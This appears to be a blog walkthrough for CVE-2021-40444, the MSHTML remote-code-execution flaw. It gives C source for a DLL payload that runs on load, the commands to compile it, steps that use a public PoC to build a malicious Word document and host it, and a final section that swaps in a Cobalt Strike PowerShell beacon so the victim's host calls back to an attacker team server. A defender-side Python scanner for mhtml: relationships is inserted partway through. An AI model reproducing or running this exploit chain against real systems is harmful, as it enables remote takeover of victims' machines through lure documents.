Preface
Microsoft's MSHTML engine contains a code-execution vulnerability (CVE-2021-40444). An attacker crafts an Office document that embeds a malicious ActiveX control and lures the user into opening it, achieving remote code execution. When ActiveX controls are enabled on the user's host, an attacker can take control of that host through this vulnerability.
Affected scope
- Windows Server, version 20H2 (Server Core Installation)
- Windows Server, version 2004 (Server Core installation)
- Windows Server 2022 (Server Core installation)
- Windows Server 2022
- Windows Server 2019 (Server Core installation)
- Windows Server 2019
- Windows Server 2016 (Server Core installation)
- Windows Server 2016
- Windows Server 2012 R2 (Server Core installation)
- Windows Server 2012 R2
- Windows Server 2012 (Server Core installation)
- Windows Server 2012
- Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
- Windows Server 2008 for x64-based Systems Service Pack 2
- Windows Server 2008 32-bit Systems Service Pack 2 (Server Core installation)
- Windows Server 2008 32-bit Systems Service Pack 2
- Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
- Windows Server 2008 R2 for x64-based Systems Service Pack 1
- Windows RT 8.1
- Windows 8.1 for x64-based systems
- Windows 8.1 32-bit systems
- Windows 7 for x64-based Systems Service Pack 1
- Windows 7 32-bit Systems Service Pack 1
- Windows 10 for x64-based Systems
- Windows 10 32-bit Systems
- Windows 10 Version 21H1 for x64-based Systems
- Windows 10 Version 21H1 for ARM64-based Systems
- Windows 10 Version 21H1 32-bit Systems
- Windows 10 Version 20H2 for x64-based Systems
- Windows 10 Version 20H2 for ARM64-based Systems
- Windows 10 Version 20H2 32-bit Systems
- Windows 10 Version 2004 for x64-based Systems
- Windows 10 Version 2004 for ARM64-based Systems
- Windows 10 Version 2004 32-bit Systems
- Windows 10 Version 1909 for x64-based Systems
- Windows 10 Version 1909 for ARM64-based Systems
- Windows 10 Version 1909 32-bit Systems
- Windows 10 Version 1809 for x64-based Systems
- Windows 10 Version 1809 for ARM64-based Systems
- Windows 10 Version 1809 32-bit Systems
- Windows 10 Version 1607 for x64-based Systems
- Windows 10 Version 1607 32-bit Systems
Vulnerability reproduction
Prepare the calc.c file

```c
#include <windows.h>
#include <stdlib.h>   /* system() */

/* Payload used for this reproduction: launch the calculator. */
void exec(void)
{
    system("C:\\Windows\\System32\\calc.exe");
}

/* DLL entry point: run the payload as soon as the DLL is loaded into a process. */
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
{
    switch (fdwReason) {
    case DLL_PROCESS_ATTACH:
        exec();
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
```
Compile it into a DLL

```shell
sudo apt-get install gcc-mingw-w64
i686-w64-mingw32-gcc -shared calc.c -o calc.dll
```
Download the POC
Download address: https://github.com/lockedbyte/CVE-2021-40444
Put the DLL into the test directory, replacing the file that is already there.
Generate the docx document from the DLL

```shell
sudo python3 exploit.py generate test/calc.dll http://<SRVIP>   # SRVIP is the server's IP
```

This produces out/document.docx, word.html and word.cab.
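The three artifacts above are also what a defender can key on. A .docx is a zip archive, and documents of this kind carry an oleObject relationship in word/_rels/document.xml.rels whose Target is an external URL with the mhtml: scheme (typically followed by !x-usc:<url>), which is what makes Word fetch the remote word.html through MSHTML. The following Python script is an added, defender-side example written for this page; it is not part of the original post or of the lockedbyte PoC. It builds a constructed sample document in memory (placeholder host srvip.invalid, no exploit content) and flags any external relationship whose target uses the mhtml: scheme.

```python
"""Defender-side check for CVE-2021-40444-style .docx files.

Flags relationship parts (*.rels) inside the archive that contain an external
relationship whose Target uses the mhtml: scheme. The sample document built by
build_sample_docx() is a constructed fixture, not a real or malicious file.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL_TYPE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                "relationships/oleObject")
# Any external relationship whose target starts with "mhtml:" is suspicious;
# the "!x-usc:" suffix seen in real samples is reported as part of the target.
MHTML_TARGET = re.compile(r"^\s*mhtml:", re.IGNORECASE)


def suspicious_relationships(docx_bytes: bytes) -> list:
    """Return (rels_part, relationship_type, target) for every external
    relationship in the archive whose target uses the mhtml: scheme."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as archive:
        for name in archive.namelist():
            if not name.lower().endswith(".rels"):
                continue
            try:
                root = ET.fromstring(archive.read(name))
            except ET.ParseError:
                continue  # malformed part: nothing we can inspect here
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                target = rel.get("Target", "")
                if rel.get("TargetMode") == "External" and MHTML_TARGET.match(target):
                    findings.append((name, rel.get("Type", ""), target))
    return findings


def scan_docx_file(path: str) -> list:
    """Convenience wrapper: scan a .docx stored on disk."""
    with open(path, "rb") as fh:
        return suspicious_relationships(fh.read())


def build_sample_docx(target: str, target_mode: str = "External") -> bytes:
    """Construct a minimal .docx-shaped zip with one oleObject relationship
    pointing at `target` (test fixture only; contains no exploit content)."""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{REL_NS}">'
        f'<Relationship Id="rId5" Type="{OLE_REL_TYPE}" '
        f'Target="{target}" TargetMode="{target_mode}"/>'
        "</Relationships>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as archive:
        archive.writestr(
            "[Content_Types].xml",
            '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        archive.writestr(
            "word/document.xml",
            '<?xml version="1.0"?><w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        archive.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    # Constructed samples with a placeholder host; the first mirrors the
    # relationship shape the PoC generates, the second is an ordinary
    # external link that must not be flagged.
    bad = build_sample_docx(
        "mhtml:http://srvip.invalid/word.html!x-usc:http://srvip.invalid/word.html")
    good = build_sample_docx("https://example.invalid/embedded.xlsx")
    print("suspicious:", suspicious_relationships(bad))
    print("clean     :", suspicious_relationships(good))
```

The check deliberately looks at every *.rels part rather than only document.xml.rels, because the same relationship can be placed in other parts (headers, footers) of the package; a TargetMode of "Internal" or any non-mhtml scheme is left alone so ordinary embedded objects do not trigger it.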
Start the web server

```shell
sudo python3 exploit.py host 80
```

Upload the generated document.docx to the target machine and open it; the calculator pops up, confirming the vulnerability.
Exploitation
What good is popping a calculator on the target? We need to find a way to make use of this vulnerability.
Getting a CS beacon
Start a CS team server on Kali

```shell
sudo ./teamserver 192.168.45.129 123456
```

Then open the client.
Set up a listener.
Generate a PowerShell command.
Modify calc.c, replacing its payload with the generated one, and rename it cs.c.
Compile cs.c into cs.dll.
Copy the generated cs.dll into the test directory and run the script to generate the Word document.
Start the web server

```shell
sudo python3 exploit.py host 80
```

Upload the generated document to the target host, open it, and click "Enable Editing".
The CS beacon checks in successfully.